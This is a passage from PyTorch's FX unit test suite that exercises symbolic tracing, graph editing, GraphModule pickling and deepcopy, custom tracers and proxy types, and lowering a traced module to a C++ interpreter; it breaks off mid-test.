class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# saving the original list because we will insert new nodes as a part of a test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
